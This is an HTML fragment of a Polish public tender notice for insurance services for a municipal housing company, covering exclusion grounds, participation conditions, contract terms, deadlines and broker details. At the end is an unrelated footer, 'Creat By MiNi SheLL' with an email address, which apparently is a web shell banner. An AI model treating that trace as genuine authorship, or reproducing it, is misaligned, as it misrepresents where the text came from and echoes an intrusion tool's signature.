ubezpieczeniu obowiązkowym odpowiedzialności cywilnej zarządcy nieruchomości z kwoty – 50 000,00 EURO na kwotę – 100 000,00 EURO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu, określone przez zamawiającego w SWZ.<br/>2. Zamawiający wymaga wykazania spełniania następujących warunków określonych w art. 112 ust. 2<br/>ustawy Pzp, dotyczących:<br/>a) Zdolności do występowania w obrocie prawnym:<br/>zamawiający nie określa wyżej wymienionego warunku.<br/>b) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca musi wykazać, że posiada zezwolenie na prowadzenie działalności ubezpieczeniowej w zakresie wszystkich<br/>grup ryzyk objętych przedmiotem zamówienia zgodnie z ustawą z dnia 11 września 2015 r. o działalności ubezpieczeniowej<br/>i reasekuracyjnej (Dz. U. z 2023 r. poz. 656), a w przypadku gdy Wykonawca rozpoczął działalność przed wejściem w życie<br/>Ustawy z dnia 28 lipca 1990 r. o działalności ubezpieczeniowej (Dz. U. Nr 59, poz. 344 ze zm.) posiada zaświadczenie<br/>Ministra Finansów o posiadaniu zgody na wykonywanie działalności ubezpieczeniowej.<br/>c) Sytuacji ekonomicznej lub finansowej:<br/>zamawiający nie określa wyżej wymienionego warunku.<br/>d) Zdolności technicznej lub zawodowej:<br/>zamawiający nie określa wyżej wymienionego warunku.<br/>3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, na zasadach określonych<br/>w art. 58-60 ustawy Pzp.<br/>4. Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu, może polegać na<br/>zdolnościach technicznych lub zawodowych, sytuacji finansowej i ekonomicznej innych podmiotów, niezależnie od<br/>charakteru prawnego łączących go z nim stosunków prawnych, na zasadach określonych w art. 118-123 ustawy Pzp.<br/>5. Zamawiający oceni czy udostępniane wykonawcy przez podmioty udostępniające zasoby zdolności<br/>techniczne lub zawodowe lub ich sytuacja ekonomiczna lub finansowa, pozwalają na wykazanie przez wykonawcę<br/>spełniania warunków udziału w postępowaniu oraz zbada czy nie zachodzą wobec tych podmiotów podstawy wykluczenia,<br/>które zostały przewidziane względem wykonawcy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia żadnych podmiotowych środków dowodowych za wyjątkiem oświadczenia wykonawcy na podstawie art. 125 ust. 1 ustawy Pzp w zakresie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 5), 8), 9) i 10) ustawy Pzp, które wykonawca dołącza do oferty</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>2.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie<br/>dotyczące niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu składa<br/>każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art.454-455 pzp oraz wskazanym w projektowanych postanowieniach umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-30 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający Zarząd Budynków Miejskich II Towarzystwo Budownictwa Społecznego Sp. z o.o. powołał pełnomocnika –<br/>Kancelarię Brokerską “KAPITAŁ” Sp. z o. o. 41-902 Bytom, ul Strzelców Bytomskich 1/3, na podstawie art. 37 ust. 2 ustawy -<br/>Pzp, do wykonywania określonych czynności w postępowaniu o udzielenie zamówienia, jak również do wykonywania<br/>określonych czynności przy realizacji umowy o świadczenie usług ubezpieczeniowych zgodnie z ustawą z dnia 15 grudnia<br/>2017 r. o dystrybucji ubezpieczeń. (Dz. U. z 2022 r. poz. 905). Wynagrodzenie Brokera za pośrednictwo przy zawieraniu<br/>umów ubezpieczeniowych wypłaci mu zgodnie z obecnie przyjętymi na rynku ubezpieczeniowym zasadami Wykonawca, z<br/>którym zostanie zawarta umowa w sprawie zamówienia publicznego. Pełnomocnictwo załączone jest do SWZ. Wykonawcy<br/>mogą wystąpić do pełnomocnika z zapytaniem o wysokość wynagrodzenia (kurtażu) przed złożeniem oferty. W tym celu<br/>Wykonawcy są zobowiązani skontaktować się z Kancelarią Brokerską „KAPITAŁ” Sp. z o.o. (pełnomocnik).

Creat By MiNi SheLL
Email: jattceo@gmail.com